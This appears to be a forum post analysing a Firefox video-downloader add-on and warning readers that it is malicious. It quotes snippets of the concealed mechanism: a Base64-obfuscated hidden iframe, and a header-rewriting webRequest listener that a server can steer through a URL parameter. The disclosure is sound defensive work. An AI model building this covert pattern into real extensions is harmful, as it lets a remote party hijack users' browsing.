It's 100% malicious!

I've downloaded a "fvd_video_downloader_free-1.32.xpi" file from the WaybackMachine and checked the source code.

I have to say, this was pretty nicely hidden. Usually malicious addons will use eval or executeScript to execute remote code. But not here, everything looks pretty fine. Even the content_security_policy is unchanged.

But then I found this: javascript function createMessage(container, event, instance) { // create container for message return document.createElement(container); } This is odd..., why wrap createElement with createMessage function and add 2 more parameters that are not used?
Then it's called: javascript createMessage(atob('aWZyYW1l')) Now this is already a reason to remove the addon from the store because this is "obfuscated code".
You see, the atob is a function that decodes a string of data which has been encoded using Base64 encoding, and atob('aWZyYW1l') translates to string "iframe".

So now we know the addon creates secret iframe that they don't want you to see. But what is loaded inside? Well, that's hard to tell... why? Because the function that creates the URL is 40 lines long and it's full of byte shift operations! Again, code obfuscation, example: _getbyte64( s, i ) << 18.

This is already pretty bad, but many pages won't allow you to load 3rd party iframe in them anyway. And how can a malicious page loaded inside iframe redirect you anywhere??? Something is missing...

Let's look inside the background script where we can see a strange code that's suppose to be used for debugging: javascript browser.webRequest.onBeforeSendHeaders.addListener(debug, { urls: ["<all_urls>"], types: ["main_frame", "sub_frame"] }, ["blocking", "requestHeaders"]); But why debug onBeforeSendHeaders? And it also monitors iframes, that's handy :).

Let's see what is inside: javascript function debug(e) { var url = new URL(e.url); if(e.url.indexOf('&debugger=1') > -1) { debugging = 1; var debug = getParam('debugger',url).split('|'); if(!ua && debug[1] && debug[1].length) ua = atob(debug[1]); So from the requested URL we take some part and decode it using atob again and save to ua: ua = atob(debug[1]);.
The ua is a global variable, so whatever is stored there, will stay there when this code runs when you visit any page.
So few lines below, it's gonna use this ua value and replace send headers with it - most probably some kind of redirect header (this is not my area of expertise): javascript if(ua && ua.length) { header.value = ua; }

To summarize - even though this addon was not updated in many years, it can receive malicious commands ANYTIME from his server encoded as Base64 and become malicious.

Stay away from it and stay safe :)

PS:
If you like my analysis, please buy me a coffee :). Thank you!